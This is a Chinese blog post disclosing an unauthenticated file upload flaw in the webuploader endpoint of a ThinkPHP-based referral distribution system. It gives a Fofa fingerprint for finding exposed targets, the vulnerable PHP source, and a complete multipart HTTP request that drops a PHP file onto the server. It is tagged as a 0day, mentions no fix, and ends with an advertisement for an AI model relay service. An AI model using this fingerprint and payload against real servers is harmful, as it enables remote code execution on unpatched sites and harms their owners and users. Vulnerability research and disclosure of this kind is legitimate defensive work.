文章总结: 文档披露某自适应任务拉新分销系统在public/static/lib/webuploader/0.1.5/server/fileupload.php中存在高危文件上传漏洞,攻击者可通过控制$_REQUEST[‘name’]参数直接上传恶意PHP文件,无需认证或扩展名校验。漏洞复现成功并附有详细Payload,作者强调使用AI工具自动化挖掘,建议开发者加强文件上传校验机制。 综合评分: 81 文章分类: 漏洞分析,代码审计,WEB安全,渗透测试,安全工具
某自适应任务拉新分销系统存在文件上传漏洞
原创
XingYue404 XingYue404
星悦安全
2026年6月8日 15:23 浙江
在小说阅读器读本章
去阅读
点击上方蓝字关注我们 并设为星标
0x00 前言
没什么技术含量,全程AI自动审计,无特别提示词,同款AI审计看文末
矩阵式裂变分润逻辑:系统核心采用“总代-服务商-员工”三级管理模式。总代与服务商可精准控制下级 0-10% 的利润差价,实现一键调价,前端实时更新。这种**“无限裂变”**机制配合总代特有的每单 0.5 元团队奖励,能迅速激活地推团队,通过利益驱动实现指数级增长
Fofa指纹 : “/static/home/login/reset.css”
框架:ThinkPHP
0x01 漏洞分析&复现
位于 public/static/lib/webuploader/0.1.5/server/fileupload.php 中,上传文件可由$_REQUEST["name"]控制,且未发现认证、CSRF 校验、扩展名白名单或 MIME 校验
<?php/** * upload.php * * Copyright 2013, Moxiecode Systems AB * Released under GPL License. * * License: http://www.plupload.com/license * Contributing: http://www.plupload.com/contributing */
#!! 注意#!! 此文件只是个示例,不要用于真正的产品之中。#!! 不保证代码安全性。
#!! IMPORTANT:#!! this file is just an example, it doesn't incorporate any security checks and#!! is not recommended to be used in production environment as it is. Be sure to#!! revise it and customize to your needs.
// Make sure file is not cached (as it happens for example on iOS devices)header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");header("Last-Modified: " . gmdate("D, d M Y H:i:s") . " GMT");header("Cache-Control: no-store, no-cache, must-revalidate");header("Cache-Control: post-check=0, pre-check=0", false);header("Pragma: no-cache");
// Support CORS// header("Access-Control-Allow-Origin: *");// other CORS headers if any...if ($_SERVER['REQUEST_METHOD'] == 'OPTIONS') { exit; // finish preflight CORS requests here}
if ( !empty($_REQUEST[ 'debug' ]) ) { $random = rand(0, intval($_REQUEST[ 'debug' ]) ); if ( $random === 0 ) { header("HTTP/1.0 500 Internal Server Error"); exit; }}
// header("HTTP/1.0 500 Internal Server Error");// exit;
// 5 minutes execution time@set_time_limit(5 * 60);
// Uncomment this one to fake upload time// usleep(5000);
// Settings// $targetDir = ini_get("upload_tmp_dir") . DIRECTORY_SEPARATOR . "plupload";$targetDir = 'upload_tmp';$uploadDir = 'upload';
$cleanupTargetDir = true; // Remove old files$maxFileAge = 5 * 3600; // Temp file age in seconds
// Create target dirif (!file_exists($targetDir)) { @mkdir($targetDir);}
// Create target dirif (!file_exists($uploadDir)) { @mkdir($uploadDir);}
// Get a file nameif (isset($_REQUEST["name"])) { $fileName = $_REQUEST["name"];} elseif (!empty($_FILES)) { $fileName = $_FILES["file"]["name"];} else { $fileName = uniqid("file_");}
$filePath = $targetDir . DIRECTORY_SEPARATOR . $fileName;$uploadPath = $uploadDir . DIRECTORY_SEPARATOR . $fileName;
// Chunking might be enabled$chunk = isset($_REQUEST["chunk"]) ? intval($_REQUEST["chunk"]) : 0;$chunks = isset($_REQUEST["chunks"]) ? intval($_REQUEST["chunks"]) : 1;
// Remove old temp filesif ($cleanupTargetDir) { if (!is_dir($targetDir) || !$dir = opendir($targetDir)) { die('{"jsonrpc" : "2.0", "error" : {"code": 100, "message": "Failed to open temp directory."}, "id" : "id"}'); }
while (($file = readdir($dir)) !== false) { $tmpfilePath = $targetDir . DIRECTORY_SEPARATOR . $file;
// If temp file is current file proceed to the next if ($tmpfilePath == "{$filePath}_{$chunk}.part" || $tmpfilePath == "{$filePath}_{$chunk}.parttmp") { continue; }
// Remove temp file if it is older than the max age and is not the current file if (preg_match('/\.(part|parttmp)$/', $file) && (@filemtime($tmpfilePath) < time() - $maxFileAge)) { @unlink($tmpfilePath); } } closedir($dir);}
// Open temp fileif (!$out = @fopen("{$filePath}_{$chunk}.parttmp", "wb")) { die('{"jsonrpc" : "2.0", "error" : {"code": 102, "message": "Failed to open output stream."}, "id" : "id"}');}
if (!empty($_FILES)) { if ($_FILES["file"]["error"] || !is_uploaded_file($_FILES["file"]["tmp_name"])) { die('{"jsonrpc" : "2.0", "error" : {"code": 103, "message": "Failed to move uploaded file."}, "id" : "id"}'); }
// Read binary input stream and append it to temp file if (!$in = @fopen($_FILES["file"]["tmp_name"], "rb")) { die('{"jsonrpc" : "2.0", "error" : {"code": 101, "message": "Failed to open input stream."}, "id" : "id"}'); }} else { if (!$in = @fopen("php://input", "rb")) { die('{"jsonrpc" : "2.0", "error" : {"code": 101, "message": "Failed to open input stream."}, "id" : "id"}'); }}
while ($buff = fread($in, 4096)) { fwrite($out, $buff);}
@fclose($out);@fclose($in);
rename("{$filePath}_{$chunk}.parttmp", "{$filePath}_{$chunk}.part");
$index = 0;$done = true;for( $index = 0; $index < $chunks; $index++ ) { if ( !file_exists("{$filePath}_{$index}.part") ) { $done = false; break; }}if ( $done ) { if (!$out = @fopen($uploadPath, "wb")) { die('{"jsonrpc" : "2.0", "error" : {"code": 102, "message": "Failed to open output stream."}, "id" : "id"}'); }
if ( flock($out, LOCK_EX) ) { for( $index = 0; $index < $chunks; $index++ ) { if (!$in = @fopen("{$filePath}_{$index}.part", "rb")) { break; }
while ($buff = fread($in, 4096)) { fwrite($out, $buff); }
@fclose($in); @unlink("{$filePath}_{$index}.part"); }
flock($out, LOCK_UN); } @fclose($out);}
// Return Success JSON-RPC responsedie('{"jsonrpc" : "2.0", "result" : null, "id" : "id"}');
Payload:
POST /static/lib/webuploader/0.1.5/server/fileupload.php?name=audit.php&chunk=0&chunks=1 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7Cache-Control: max-age=0Connection: keep-aliveContent-Length: 197Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryd8pwpkIz0eDkBEbcHost: 192.168.140.128Origin: http://192.168.140.128Referer: http://192.168.140.128/static/lib/webuploader/0.1.5/server/fileupload.php?name=audit.php&chunk=0&chunks=1Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.0.0 Safari/537.36
------WebKitFormBoundarytWIvtdAsZeAHIKQNContent-Disposition: form-data; name="file"; filename="1.php"Content-Type: image/jpeg
<?php phpinfo();?>------WebKitFormBoundarytWIvtdAsZeAHIKQN--
文件上传在
/static/lib/webuploader/0.1.5/server/upload/audit.php
0x04 漏洞挖掘
标签:代码审计,0day,渗透测试,系统,通用,0day,闲鱼,交易所
本漏洞完全由星悦AI中转提供的GPT5.5挖掘.
今天6.8日全天GPT所有模型全部免费使用,随便Xhigh,无速率限制
https://www.xyusec.com/
DeepSeek-v4-flash DeepSeek-v4-Pro
Glm-5 Glm-5.1 kimi-k2.5 miniMax-M2.5 Qwen3-235B-A22B Qwen3.5-397B-A17B
以上模型全部免费使用,还可以进群领取5$
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,文章作者和本公众号不承担任何法律及连带责任,望周知!!!****
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:星悦安全 XingYue404 XingYue404《某自适应任务拉新分销系统存在文件上传漏洞》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
评论